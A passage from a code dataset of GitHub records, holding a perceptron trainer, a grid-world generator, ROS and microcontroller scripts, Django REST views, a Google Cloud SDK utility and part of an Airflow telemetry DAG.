teams\n\n\ndef create_roll_avg(games,new_cols,aver_cols):\n\n    # group and compute the rolling averages for each team over the last 5 games\n    games_averages = games.groupby('Tm').apply(lambda x: compute_rolling(new_cols, aver_cols, x))\n    games_averages= games_averages.droplevel('Tm')\n    games_averages.index = range(games_averages.shape[0])\n    return games_averages\n","repo_name":"dvholmes/twitter_bot","sub_path":"mlbpredictor/additional_functions/rolling_coverter.py","file_name":"rolling_coverter.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"74815805982","text":"import numpy as np\r\nimport csv\r\n\r\n# Function to read the patterns from a CSV file\r\ndef leer_patrones(filename):\r\n    entradas = []\r\n    salidas = []\r\n    with open(filename, mode='r', newline='') as file:\r\n        csv_reader = csv.reader(file)\r\n        for row in csv_reader:\r\n            entradas.append([float(x) for x in row[:-1]])\r\n            salidas.append(float(row[-1]))\r\n    return np.array(entradas), np.array(salidas)\r\n\r\ndef activacion(pesos,x,b):\r\n    z=pesos * x\r\n    if z.sum() + b > 0:\r\n        return 1\r\n    else:\r\n        return -1\r\n\r\ndef probando(pesos,x,b):\r\n    z=pesos * x\r\n    if z.sum() + b > 0 :\r\n        return -1\r\n    else:\r\n        return 1\r\n\r\n# Function to train a simple perceptron\r\ndef entrenar_perceptron(entradas, salidas, tasa_aprendizaje, max_epocas, criterio_error):\r\n    num_entradas = entradas.shape[1]\r\n    num_patrones = entradas.shape[0]\r\n\r\n    # Initialize weights and bias\r\n    pesos = np.random.uniform(-1,1,size=2)\r\n    print(f\"{pesos}\")\r\n    bias = np.random.uniform(-1,1)\r\n    epoca=0\r\n    \r\n    for epoca in range(max_epocas):\r\n        error_epoca=0\r\n        print(f\"epoch {epoca}\")\r\n        for i in range(num_patrones):\r\n            prediccion=activacion(pesos,entradas[i],bias)\r\n            error= salidas[i]-prediccion\r\n\r\n            pesos[0] += tasa_aprendizaje * entradas[i][0] * error\r\n            pesos[1] += tasa_aprendizaje * entradas[i][1] * error\r\n            bias += tasa_aprendizaje * error\r\n            error_epoca += error**2\r\n            print(f\"{error},{epoca},{bias},{pesos}\")\r\n        print(f\"{error_epoca}\")\r\n\r\n    return pesos, bias\r\n\r\n# Function to test the trained perceptron on real data\r\ndef probar_perceptron(entradas, pesos, bias):\r\n    num_patrones = entradas.shape[0]\r\n    resultados = []\r\n\r\n    for i in range(num_patrones):\r\n        prediccion=probando(pesos,entradas[i],bias)\r\n        resultados.append(prediccion)\r\n\r\n    return resultados\r\n\r\nif __name__ == \"__main__\":\r\n    # Read the training patterns from a CSV file\r\n    archivo_entrenamiento = \"patrones_entrenamiento.csv\"\r\n    entradas, salidas = leer_patrones(archivo_entrenamiento)\r\n\r\n    # Configure the hyperparameters\r\n    tasa_aprendizaje = 0.01\r\n    max_epocas = 1000\r\n    criterio_error = 1\r\n\r\n    # Train the perceptron\r\n    pesos, bias = entrenar_perceptron(entradas, salidas, tasa_aprendizaje, max_epocas, criterio_error)\r\n    print(f\"{pesos} and {bias}\")\r\n\r\n    # Read the test patterns from another CSV file\r\n    archivo_prueba = \"XOR_tst.csv\"\r\n    entradas_prueba, salidas_prueba = leer_patrones(archivo_prueba)\r\n\r\n    # Test the trained perceptron on the test data\r\n    resultados_prueba = probar_perceptron(entradas_prueba, pesos, bias)\r\n\r\n    print(\"Test results:\")\r\n    for i, resultado in enumerate(resultados_prueba):\r\n        print(f\"Input: {entradas_prueba[i]}, Output: 
{resultado}\")\r\n","repo_name":"DaraFengari/Perceptron","sub_path":"Perceptron.py","file_name":"Perceptron.py","file_ext":"py","file_size_in_byte":2927,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"27765065479","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nfrom googlecloudsdk.command_lib.util.apis import arg_utils\n\nPERSISTENT_RESOURCE_COLLECTION = 'aiplatform.projects.locations.persistentResources'\n\n\ndef _ConstructSingleResourcePoolSpec(aiplatform_client,\n spec):\n \"\"\"Constructs a single resource pool spec.\n\n Args:\n aiplatform_client: The AI Platform API client used.\n spec: A dict whose fields represent a resource pool spec.\n\n Returns:\n A ResourcePoolSpec message instance for setting a resource pool in a\n Persistent Resource\n \"\"\"\n resource_pool = aiplatform_client.GetMessage('ResourcePool')()\n\n machine_spec_msg = aiplatform_client.GetMessage('MachineSpec')\n machine_spec = machine_spec_msg(machineType=spec.get('machine-type'))\n accelerator_type = spec.get('accelerator-type')\n if accelerator_type:\n machine_spec.acceleratorType = arg_utils.ChoiceToEnum(\n accelerator_type, machine_spec_msg.AcceleratorTypeValueValuesEnum)\n machine_spec.acceleratorCount = int(spec.get('accelerator-count', 1))\n resource_pool.machineSpec = machine_spec\n\n replica_count = spec.get('replica-count')\n if replica_count:\n resource_pool.replicaCount = int(replica_count)\n min_replica_count = spec.get('min-replica-count')\n max_replica_count = spec.get('max-replica-count')\n if min_replica_count or max_replica_count:\n autoscaling_spec = (\n aiplatform_client.GetMessage('ResourcePoolAutoscalingSpec')())\n autoscaling_spec.minReplicaCount = int(min_replica_count)\n autoscaling_spec.maxReplicaCount = int(max_replica_count)\n resource_pool.autoscalingSpec = autoscaling_spec\n\n disk_type = spec.get('disk-type')\n disk_size = spec.get('disk-size')\n if disk_type:\n disk_spec_msg = aiplatform_client.GetMessage('DiskSpec')\n disk_spec = disk_spec_msg(bootDiskType=disk_type, bootDiskSizeGb=disk_size)\n resource_pool.diskSpec = disk_spec\n\n return resource_pool\n\n\ndef _ConstructResourcePoolSpecs(aiplatform_client, specs, **kwargs):\n \"\"\"Constructs the resource pool specs for a persistent resource.\n\n Args:\n aiplatform_client: The AI Platform API client used.\n specs: A list of dict of resource pool specs, supposedly derived from\n the gcloud command flags.\n **kwargs: The keyword args to pass down to construct each worker pool spec.\n\n Returns:\n A list of ResourcePool message instances for creating a Persistent Resource.\n \"\"\"\n resource_pool_specs = []\n\n for spec in specs:\n if spec:\n resource_pool_specs.append(\n _ConstructSingleResourcePoolSpec(aiplatform_client, spec, **kwargs))\n else:\n resource_pool_specs.append(\n aiplatform_client.GetMessage('ResourcePoolSpec')())\n\n return resource_pool_specs\n\n\ndef ConstructResourcePools(\n aiplatform_client,\n persistent_resource_config=None,\n resource_pool_specs=None,\n **kwargs\n):\n \"\"\"Constructs the resource pools to be used to create a Persistent Resource.\n\n Resource pools from the config file and arguments will be combined.\n\n Args:\n aiplatform_client: The AI Platform API client used.\n persistent_resource_config: A Persistent Resource configuration imported\n from a YAML config.\n resource_pool_specs: A dict of worker pool specification, usually derived\n from the gcloud 
command argument values.\n **kwargs: The keyword args to pass to construct the worker pool specs.\n\n Returns:\n An array of ResourcePool messages for creating a Persistent Resource.\n \"\"\"\n\n resource_pools = []\n if isinstance(persistent_resource_config.resourcePools, list):\n resource_pools = persistent_resource_config.resourcePools\n if resource_pool_specs:\n resource_pools = resource_pools + _ConstructResourcePoolSpecs(\n aiplatform_client, resource_pool_specs, **kwargs)\n\n return resource_pools\n\n\ndef _IsKwargsDefined(key, **kwargs):\n return key in kwargs and bool(kwargs.get(key))\n","repo_name":"twistedpair/google-cloud-sdk","sub_path":"google-cloud-sdk/lib/googlecloudsdk/command_lib/ai/persistent_resources/persistent_resource_util.py","file_name":"persistent_resource_util.py","file_ext":"py","file_size_in_byte":3964,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"7"} +{"seq_id":"30663954739","text":"from typing import List\n\n\nclass Solution:\n def threeEqualParts(self, A: List[int]) -> List[int]:\n def traverse(front, part):\n i = front - 1\n while A[i] == 0:\n i -= 1\n zeros[part] = front - 1 - i\n j = i\n freq = 1\n while freq < count:\n i -= 1\n if A[i] == 1:\n freq += 1\n return i, j\n\n if len(A) < 3:\n return [-1, -1]\n count = sum(A)\n if count == 0:\n return [0, 2]\n if count % 3:\n return [-1, -1]\n count /= 3\n zeros = [0] * 3\n\n i2, j2 = traverse(len(A), 2)\n i1, j1 = traverse(i2, 1)\n if zeros[2] > zeros[1] or j2 - i2 != j1 - i1:\n return [-1, -1]\n i0, j0 = traverse(i1, 0)\n if zeros[2] > zeros[0] or j1 - i1 != j0 - i0:\n return [-1, -1]\n if A[i0:j0] == A[i1:j1] == A[i2:j2]:\n return [j0 + zeros[2], j1 + 1 + zeros[2]]\n else:\n return [-1, -1]\n\n\nprint(Solution().threeEqualParts([1, 1, 0, 0, 1]))\n","repo_name":"yutao-li/leetcode","sub_path":"927.py","file_name":"927.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"26806892803","text":"import random\nfrom enum import Enum\n\n\nclass Objects(Enum):\n NOTHING = 0.0\n GOAL = 100.0\n BOMB = -50.0\n OBSTACLE = -100\n\n\nclass GridWorld:\n def __init__(self, width, height, bombs, rewards):\n self.width = width\n self.height = height\n self.room_width = self.room_height = 5\n\n self.grid, self.current_grid, self.last_grid = self.fill_grids()\n\n self.corridors = self.place_corridors()\n self.place_walls()\n self.bombs_coordinates = self.place_item(bombs, Objects.BOMB)\n self.rewards_coordinates = self.place_item(rewards, Objects.GOAL)\n\n def __str__(self):\n return f'GridWorld {self.width}x{self.height}'\n\n def print_world(self):\n for row in self.current_grid:\n for elem in row:\n if elem == Objects.OBSTACLE.value:\n print(\"{:>10}\".format(\"####\"), end='')\n else:\n print(\"{:>10.2f}\".format(elem), end='')\n\n print()\n\n print()\n\n def fill_grids(self):\n return [[Objects.NOTHING for _ in range(self.width)] for _ in range(self.height)], \\\n [[Objects.NOTHING.value for _ in range(self.width)] for _ in range(self.height)], \\\n [[Objects.NOTHING.value for _ in range(self.width)] for _ in range(self.height)]\n\n def random_coordinates(self):\n x, y = random.randint(0, self.width - 1), random.randint(0, self.height - 1)\n\n while self.grid[x][y] != Objects.NOTHING or self.grid[x][y] == Objects.OBSTACLE:\n x, y = random.randint(0, self.width - 1), random.randint(0, self.height - 1)\n\n return x, y\n\n def place_corridors(self):\n corridors_coords = []\n 
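# reading of the loop below: each shared room wall gets one opening cut at a\r\n        # random offset, which keeps every room reachable from its neighbours\r\n        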
current_width, current_height = self.room_width - 1, self.room_height - 1\n\n for i in range(0, self.width, self.room_width):\n for j in range(0, self.height, self.room_height):\n if current_width < self.width - 1:\n temp_side = random.randint(i, min(current_height - 1, self.height - 1))\n corridors_coords.append((temp_side, current_width))\n\n if current_height < self.height - 1:\n temp_bottom = random.randint(j, min(current_width - 1, self.width - 1))\n corridors_coords.append((current_height, temp_bottom))\n\n current_width += self.room_width\n\n current_height += self.room_height\n current_width = self.room_width - 1\n\n return corridors_coords\n\n def place_walls(self):\n side, bottom = self.room_height, self.room_height\n\n while bottom < self.width:\n for horizontal in range(0, self.width):\n if bottom < self.width and (bottom - 1, horizontal) not in self.corridors:\n self.grid[min(bottom - 1, self.width - 1)][horizontal] = Objects.OBSTACLE\n self.current_grid[min(bottom - 1, self.width - 1)][horizontal] = Objects.OBSTACLE.value\n self.last_grid[min(bottom - 1, self.width - 1)][horizontal] = Objects.OBSTACLE.value\n\n bottom += self.room_width\n\n while side < self.height:\n for vertical in range(0, self.height):\n if (vertical, side - 1) not in self.corridors:\n self.grid[vertical][min(side - 1, self.height - 1)] = Objects.OBSTACLE\n self.current_grid[vertical][min(side - 1, self.height - 1)] = Objects.OBSTACLE.value\n self.last_grid[vertical][min(side - 1, self.height - 1)] = Objects.OBSTACLE.value\n\n side += self.room_height\n\n return None\n\n def place_item(self, amount, item):\n coords = []\n\n for _ in range(amount):\n x, y = self.random_coordinates()\n\n while (x, y) in self.corridors:\n x, y = self.random_coordinates()\n\n coords.append((x, y))\n self.grid[x][y] = item\n self.current_grid[x][y] = item.value\n self.last_grid[x][y] = item.value\n\n return coords\n","repo_name":"Yakorrr/AI","sub_path":"labs/lab3/world.py","file_name":"world.py","file_ext":"py","file_size_in_byte":4057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"21131081628","text":"# use analog-to-digital converter (ADC) to read analog input on pin G1,\n# convert the value to 8 bits (0 - 255 range) and print it\n\nimport os, sys, io\nimport M5\nfrom M5 import *\nfrom hardware import *\nimport time\n\nadc = None\nadc_val = None\nadc_timer = 0\nadc_calib_val = None\n\n\ndef setup():\n global adc, adc_val, adc_timer, adc_calib_val\n M5.begin()\n # configure ADC input on pin G1 with 11dB attenuation:\n adc = ADC(Pin(2), atten=ADC.ATTN_11DB)\n time.sleep_ms(500)\n adc_calib_val = adc.read() -100\n #print('save calibration value...',adc_calib_val)\n \n \n\ndef loop():\n global adc, adc_val, adc_timer\n M5.update()\n if BtnA.wasPressed():\n sensor_calibrate()\n \n \n #\n if (time.ticks_ms() > adc_timer + 100):\n # read 12-bit analog value (0 - 4095 range):\n adc_val = adc.read()\n #print(adc_val)\n # convert adc_val from 12-bit to 8-bit (0 - 255 range):\n adc_val_8bit = map_value(adc_val, in_min = 0, in_max = 4095,\n out_min = 0, out_max = 255)\n print(adc_val_8bit)\n #time.sleep_ms(100)\n adc_timer = time.ticks_ms()\n if(adc_val < adc_calib_val - 100):\n print('sensor low..')\n else:\n print('sensor high..')\n \n \n \ndef sensor_calibrate():\n global adc_calib_val\n adc_calib_val = adc.read()-100\n print('save calibration value...',adc_calib_val)\n \n\n\n\n\n\n\n# map an input value (v_in) between min/max ranges:\ndef map_value(in_val, in_min, 
in_max, out_min, out_max):\n    v = out_min + (in_val - in_min) * (out_max - out_min) / (in_max - in_min)\n    if (v < out_min): \n        v = out_min \n    elif (v > out_max): \n        v = out_max\n    return int(v)\n\nif __name__ == '__main__':\n    try:\n        setup()\n        while True:\n            loop()\n    except (Exception, KeyboardInterrupt) as e:\n        try:\n            from utility import print_error_msg\n            print_error_msg(e)\n        except ImportError:\n            print(\"please update to latest firmware\")\n\n\n","repo_name":"galinajialinzhu/Adv-prototyping","sub_path":"InClassDemo/OCT20_0840_lightresistor.py","file_name":"OCT20_0840_lightresistor.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"29617359129","text":"from .models import BookShelf\nfrom .serializer import BookShelfSerializer\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view\n\n\n\n@api_view(['GET'])\ndef BookShelf_Details(request):\n    \n    if request.method =='GET':\n        data=BookShelf.objects.all()\n        serializer=BookShelfSerializer(data,many=True)\n        return Response(serializer.data)\n\n\n@api_view(['GET'])\ndef BookShelf_SingleRecord(request,pk):\n    \n    if request.method =='GET':\n        data=BookShelf.objects.get(id=pk)\n        serializer=BookShelfSerializer(data)\n        return Response(serializer.data)\n    \n    \n@api_view(['POST'])\ndef Add_Record(request):\n\n    if request.method =='POST':\n        serializer=BookShelfSerializer(data=request.data)\n        if serializer.is_valid():\n            serializer.save()\n            return Response(serializer.data,status=status.HTTP_201_CREATED)\n        return Response(serializer.errors,status=status.HTTP_400_BAD_REQUEST)    ","repo_name":"ancorp134/Internship-task","sub_path":"Django task/bookshelf/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"880896071","text":"#! 
/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon 31 June 3:40:00 2013\n\n@author: Chang Long Zhu\n@email: changlongzj@gmail.com\n\"\"\"\n\nimport rospy\nimport smach\nimport actionlib\nfrom rospy.core import rospyinfo\nfrom smach_ros import ServiceState\n\nfrom navigation_states.nav_to_poi import nav_to_poi\nfrom speech_states.say import text_to_say \n\nENDC = '\\033[0m'\nFAIL = '\\033[91m'\nOKGREEN = '\\033[92m'\n\n\nclass prepare_state(smach.State):\n \n def __init__(self,nav_to_poi_name,tts_text):\n \n smach.State.__init__(self, outcomes=['succeeded', 'aborted', 'preempted'],\n input_keys=['tts_text','nav_to_poi_name'],\n output_keys=['tts_text','nav_to_poi_name'])\n \n self.nav_to_poi_name = nav_to_poi_name\n self.tts_text = tts_text\n \n def execute(self, userdata):\n \n if userdata.tts_text == None :\n userdata.tts_text = self.tts_text\n if userdata.nav_to_poi_name == None :\n userdata.nav_to_poi_name = self.nav_to_poi_name\n \n return 'succeeded'\n\n\nclass nav_to_poi_and_say(smach.StateMachine): \n \"\"\"\n This state will move to the POI specified and at the same time says a defined phrase.\n \n - Input Keys:\n @key nav_to_poi_name\n @key tts_text\n\n - Output keys:\n @key standard_error: inform what is the problem\n \n - No io_keys.\n\n \"\"\"\n def __init__(self, nav_to_poi_name = None, tts_text = None):\n smach.StateMachine.__init__(self, outcomes=['succeeded', 'aborted', 'preempted'],\n input_keys=['tts_text','nav_to_poi_name'], \n output_keys=['standard_error'])\n with self:\n self.userdata.tts_lang='en_US'\n self.userdata.tts_wait_before_speaking=0\n \n self.userdata.standard_error='OK'\n \n smach.StateMachine.add(\n 'INIT_VAR',\n prepare_state(nav_to_poi_name, tts_text),\n transitions={'succeeded': 'Concurrence_Say_Nav', 'aborted': 'aborted', \n 'preempted': 'preempted'}) \n \n sm_conc = smach.Concurrence(outcomes=['succeeded', 'preempted','aborted'],\n default_outcome='succeeded',\n input_keys=['tts_text',\n 'nav_to_poi_name',\n 'tts_wait_before_speaking',\n 'tts_lang'])\n with sm_conc:\n sm_conc.add('Say_conc',\n text_to_say())\n\n sm_conc.add('Nav_to_poi_conc',\n nav_to_poi())\n \n smach.StateMachine.add('Concurrence_Say_Nav', \n sm_conc,\n transitions={'succeeded':'succeeded',\n 'aborted':'aborted',\n 'preempted':'preempted'})\n \ndef main():\n rospy.loginfo('nav_to_poi_and_say')\n rospy.init_node('nav_to_poi_and_say_node')\n sm = smach.StateMachine(outcomes=['succeeded', 'preempted', 'aborted'])\n with sm: \n sm.userdata.tts_text = 'I am going to place'\n sm.userdata.nav_to_poi_name = 'kitchen'\n \n smach.StateMachine.add(\n 'nav_to_poi_and_say',\n nav_to_poi_and_say(),\n transitions={'succeeded': 'succeeded','preempted':'preempted', 'aborted':'aborted'})\n\n sm.execute()\n rospy.spin()\n\nif __name__=='__main__':\n main()\n","repo_name":"reem-utils/robocup2014","sub_path":"basic_states/hri_states/src/hri_states/nav_to_poi_and_say.py","file_name":"nav_to_poi_and_say.py","file_ext":"py","file_size_in_byte":3817,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"7"} +{"seq_id":"14678043403","text":"from airflow import DAG\nfrom datetime import datetime, timedelta\nfrom airflow.contrib.hooks.aws_hook import AwsHook\nfrom airflow.executors import get_default_executor\nfrom airflow.operators.moz_databricks import MozDatabricksSubmitRunOperator\nfrom airflow.operators.subdag_operator import SubDagOperator\nfrom operators.email_schema_change_operator import EmailSchemaChangeOperator\nfrom utils.dataproc import (\n 
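# dataproc cluster helpers; the bgbb_pred_dataproc task further down runs on these\n    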
moz_dataproc_pyspark_runner,\n moz_dataproc_jar_runner,\n get_dataproc_parameters,\n)\nfrom utils.mozetl import mozetl_envvar\nfrom utils.tbv import tbv_envvar\nfrom utils.status import register_status\nfrom utils.gcp import (\n bigquery_etl_query,\n bigquery_etl_copy_deduplicate,\n export_to_parquet,\n load_to_bigquery,\n gke_command,\n)\nfrom utils.forecasting import simpleprophet_forecast\n\n\ndefault_args = {\n 'owner': 'frank@mozilla.com',\n 'depends_on_past': False,\n 'start_date': datetime(2018, 11, 27),\n 'email': ['telemetry-alerts@mozilla.com', 'frank@mozilla.com'],\n 'email_on_failure': True,\n 'email_on_retry': True,\n 'retries': 2,\n 'retry_delay': timedelta(minutes=30),\n}\n\n# Make sure all the data for the given day has arrived before running.\n# Running at 1am should suffice.\ndag = DAG('main_summary', default_args=default_args, schedule_interval='0 1 * * *', max_active_runs=10)\n\n# We copy yesterday's main pings from telemetry_live to telemetry_stable\n# at the root of this DAG because telemetry_stable.main_v4 will become\n# the source for main_summary, etc. once we are comfortable retiring parquet\n# data imports.\ncopy_deduplicate_main_ping = bigquery_etl_copy_deduplicate(\n task_id=\"copy_deduplicate_main_ping\",\n target_project_id=\"moz-fx-data-shared-prod\",\n only_tables=[\"telemetry_live.main_v4\"],\n parallelism=24,\n slices=100,\n owner=\"jklukas@mozilla.com\",\n email=[\"telemetry-alerts@mozilla.com\", \"relud@mozilla.com\", \"jklukas@mozilla.com\"],\n dag=dag)\n\nbq_main_events = bigquery_etl_query(\n task_id=\"bq_main_events\",\n project_id=\"moz-fx-data-shared-prod\",\n destination_table=\"main_events_v1\",\n dataset_id=\"telemetry_derived\",\n owner=\"ssuh@mozilla.com\",\n email=[\"telemetry-alerts@mozilla.com\", \"ssuh@mozilla.com\"],\n dag=dag,\n arguments=('--schema_update_option=ALLOW_FIELD_ADDITION',),\n)\n\nmain_summary = bigquery_etl_query(\n task_id=\"main_summary\",\n destination_table=\"main_summary_v4\",\n project_id=\"moz-fx-data-shared-prod\",\n dataset_id=\"telemetry_derived\",\n sql_file_path=\"sql/telemetry_derived/main_summary_v4/\",\n multipart=True,\n owner=\"relud@mozilla.com\",\n email=[\"telemetry-alerts@mozilla.com\", \"relud@mozilla.com\", \"pmcdermott@mozilla.com\", \"dzielaski@mozilla.com\", \"jmundi@mozilla.com\"],\n start_date=datetime(2019, 10, 25),\n dag=dag)\n\nmain_summary_bigint_columns = [\n # bigquery does not have 32-bit int, and int->bigint is not a\n # backward compatible schema change in spark, so these are the\n # bigint columns from when main summary was generated in spark, and\n # the rest are converted to 32-bit int for backward compatibility\n \"--bigint-columns\",\n \"search_counts.count\",\n \"events.timestamp\",\n \"sample_id\",\n \"os_service_pack_major\",\n \"os_service_pack_minor\",\n \"windows_build_number\",\n \"windows_ubr\",\n \"install_year\",\n \"profile_creation_date\",\n \"profile_reset_date\",\n \"session_length\",\n \"subsession_length\",\n \"timestamp\",\n \"e10s_multi_processes\",\n \"active_addons_count\",\n \"client_clock_skew\",\n \"client_submission_latency\",\n \"gc_max_pause_ms_main_above_150\",\n \"gc_max_pause_ms_main_above_250\",\n \"gc_max_pause_ms_main_above_2500\",\n \"gc_max_pause_ms_content_above_150\",\n \"gc_max_pause_ms_content_above_250\",\n \"gc_max_pause_ms_content_above_2500\",\n \"cycle_collector_max_pause_main_above_150\",\n \"cycle_collector_max_pause_main_above_250\",\n \"cycle_collector_max_pause_main_above_2500\",\n \"cycle_collector_max_pause_content_above_150\",\n 
\"cycle_collector_max_pause_content_above_250\",\n \"cycle_collector_max_pause_content_above_2500\",\n \"input_event_response_coalesced_ms_main_above_150\",\n \"input_event_response_coalesced_ms_main_above_250\",\n \"input_event_response_coalesced_ms_main_above_2500\",\n \"input_event_response_coalesced_ms_content_above_150\",\n \"input_event_response_coalesced_ms_content_above_250\",\n \"input_event_response_coalesced_ms_content_above_2500\",\n \"ghost_windows_main_above_1\",\n \"ghost_windows_content_above_1\",\n]\n\nmain_summary_export = SubDagOperator(\n subdag=export_to_parquet(\n table=\"moz-fx-data-shared-prod:telemetry_derived.main_summary_v4${{ds_nodash}}\",\n static_partitions=[\"submission_date_s3={{ds_nodash}}\"],\n arguments=[\n \"--partition-by=sample_id\",\n \"--replace='{{ds_nodash}}' AS submission_date\",\n \"--maps-from-entries\",\n ] + main_summary_bigint_columns,\n parent_dag_name=dag.dag_id,\n dag_name=\"main_summary_export\",\n default_args=default_args,\n num_workers=40),\n task_id=\"main_summary_export\",\n executor=get_default_executor(),\n dag=dag)\n\nregister_status(main_summary, \"Main Summary\", \"A summary view of main pings.\")\n\naddons = bigquery_etl_query(\n task_id=\"addons\",\n destination_table=\"addons_v2\",\n dataset_id=\"telemetry_derived\",\n dag=dag)\n\naddon_aggregates = bigquery_etl_query(\n task_id=\"addon_aggregates\",\n destination_table=\"addon_aggregates_v2\",\n dataset_id=\"telemetry_derived\",\n owner=\"bmiroglio@mozilla.com\",\n email=[\"telemetry-alerts@mozilla.com\", \"bmiroglio@mozilla.com\"],\n dag=dag)\n\nmain_summary_experiments_get_experiment_list = gke_command(\n task_id=\"main_summary_experiments_get_experiment_list\",\n command=[\"python3\", \"sql/telemetry_derived/experiments_v1/get_experiment_list.py\", \"{{ds}}\"],\n docker_image=\"mozilla/bigquery-etl:latest\",\n xcom_push=True,\n owner=\"ssuh@mozilla.com\",\n email=[\"telemetry-alerts@mozilla.com\", \"frank@mozilla.com\", \"ssuh@mozilla.com\", \"robhudson@mozilla.com\"],\n dag=dag)\n\nmain_summary_experiments = bigquery_etl_query(\n task_id=\"main_summary_experiments\",\n destination_table=\"experiments_v1\",\n parameters=(\n \"experiment_list:ARRAY:{{task_instance.xcom_pull('main_summary_experiments_get_experiment_list') | tojson}}\",\n ),\n project_id=\"moz-fx-data-shared-prod\",\n dataset_id=\"telemetry_derived\",\n owner=\"ssuh@mozilla.com\",\n email=[\"telemetry-alerts@mozilla.com\", \"frank@mozilla.com\", \"ssuh@mozilla.com\", \"robhudson@mozilla.com\"],\n dag=dag)\n\nclients_daily = bigquery_etl_query(\n task_id=\"clients_daily\",\n destination_table=\"clients_daily_v6\",\n project_id=\"moz-fx-data-shared-prod\",\n dataset_id=\"telemetry_derived\",\n owner=\"relud@mozilla.com\",\n email=[\"telemetry-alerts@mozilla.com\", \"relud@mozilla.com\", \"pmcdermott@mozilla.com\", \"dzielaski@mozilla.com\", \"jmundi@mozilla.com\"],\n start_date=datetime(2019, 11, 5),\n dag=dag)\n\nclients_daily_export = SubDagOperator(\n subdag=export_to_parquet(\n table=\"moz-fx-data-shared-prod:telemetry_derived.clients_daily_v6${{ds_nodash}}\",\n static_partitions=[\"submission_date_s3={{ds_nodash}}\"],\n arguments=[\n # restore legacy schema\n \"--maps-from-entries\",\n \"--partition-by\",\n \"submission_date_s3\",\n \"--drop\",\n \"submission_date\",\n \"total_hours_sum\",\n \"active_experiment_branch\",\n \"active_experiment_id\",\n \"histogram_parent_devtools_canvasdebugger_opened_count_sum\",\n \"histogram_parent_devtools_developertoolbar_opened_count_sum\",\n 
\"histogram_parent_devtools_shadereditor_opened_count_sum\",\n \"histogram_parent_devtools_webaudioeditor_opened_count_sum\",\n \"scalar_combined_webrtc_nicer_turn_438s_sum\",\n \"scalar_parent_aushelper_websense_reg_version\",\n \"scalar_parent_dom_contentprocess_troubled_due_to_memory_sum\",\n \"--replace\",\n \"STRING(sample_id) AS sample_id\",\n \"CAST(subsession_hours_sum AS DECIMAL(37,6)) AS subsession_hours_sum\",\n \"TRANSFORM(active_addons, _ -> STRUCT(_.addon_id AS addon_id, _.blocklisted AS blocklisted, _.name AS name, _.user_disabled AS user_disabled, _.app_disabled AS app_disabled, _.version AS version, INT(_.scope) AS scope, _.type AS type, _.foreign_install AS foreign_install, _.has_binary_components AS has_binary_components, INT(_.install_day) AS install_day, INT(_.update_day) AS update_day, INT(_.signed_state) AS signed_state, _.is_system AS is_system, _.is_web_extension AS is_web_extension, _.multiprocess_compatible AS multiprocess_compatible)) AS active_addons\",\n \"TRANSFORM(scalar_parent_devtools_accessibility_select_accessible_for_node_sum, _ -> STRUCT(_.key AS key, INT(_.value) AS value)) AS scalar_parent_devtools_accessibility_select_accessible_for_node_sum\",\n \"INT(cpu_cores) AS cpu_cores\",\n \"INT(cpu_count) AS cpu_count\",\n \"INT(cpu_family) AS cpu_family\",\n \"INT(cpu_l2_cache_kb) AS cpu_l2_cache_kb\",\n \"INT(cpu_l3_cache_kb) AS cpu_l3_cache_kb\",\n \"INT(cpu_model) AS cpu_model\",\n \"INT(cpu_speed_mhz) AS cpu_speed_mhz\",\n \"INT(cpu_stepping) AS cpu_stepping\",\n \"INT(memory_mb) AS memory_mb\",\n \"INT(profile_age_in_days) AS profile_age_in_days\",\n \"INT(sandbox_effective_content_process_level) AS sandbox_effective_content_process_level\",\n \"INT(scalar_parent_browser_engagement_max_concurrent_tab_count_max) AS scalar_parent_browser_engagement_max_concurrent_tab_count_max\",\n \"INT(scalar_parent_browser_engagement_max_concurrent_window_count_max) AS scalar_parent_browser_engagement_max_concurrent_window_count_max\",\n \"INT(scalar_parent_browser_engagement_unique_domains_count_max) AS scalar_parent_browser_engagement_unique_domains_count_max\",\n \"INT(timezone_offset) AS timezone_offset\",\n ],\n parent_dag_name=dag.dag_id,\n dag_name=\"clients_daily_export\",\n default_args=default_args,\n num_preemptible_workers=10),\n task_id=\"clients_daily_export\",\n executor=get_default_executor(),\n dag=dag)\n\nregister_status(clients_daily, \"Clients Daily\", \"A view of main pings with one row per client per day.\")\n\nclients_last_seen = bigquery_etl_query(\n task_id=\"clients_last_seen\",\n destination_table=\"clients_last_seen_v1\",\n project_id=\"moz-fx-data-shared-prod\",\n dataset_id=\"telemetry_derived\",\n owner=\"relud@mozilla.com\",\n email=[\"telemetry-alerts@mozilla.com\", \"relud@mozilla.com\", \"jklukas@mozilla.com\", \"pmcdermott@mozilla.com\", \"dzielaski@mozilla.com\", \"jmundi@mozilla.com\"],\n depends_on_past=True,\n start_date=datetime(2019, 4, 15),\n dag=dag)\n\nexact_mau_by_dimensions = bigquery_etl_query(\n task_id=\"exact_mau_by_dimensions\",\n destination_table=\"firefox_desktop_exact_mau28_by_dimensions_v1\",\n dataset_id=\"telemetry\",\n owner=\"relud@mozilla.com\",\n email=[\"telemetry-alerts@mozilla.com\", \"relud@mozilla.com\", \"pmcdermott@mozilla.com\", \"dzielaski@mozilla.com\", \"jmundi@mozilla.com\"],\n dag=dag)\n\nexact_mau_by_client_count_dimensions = bigquery_etl_query(\n task_id=\"exact_mau_by_client_count_dimensions\",\n project_id='moz-fx-data-shared-prod',\n 
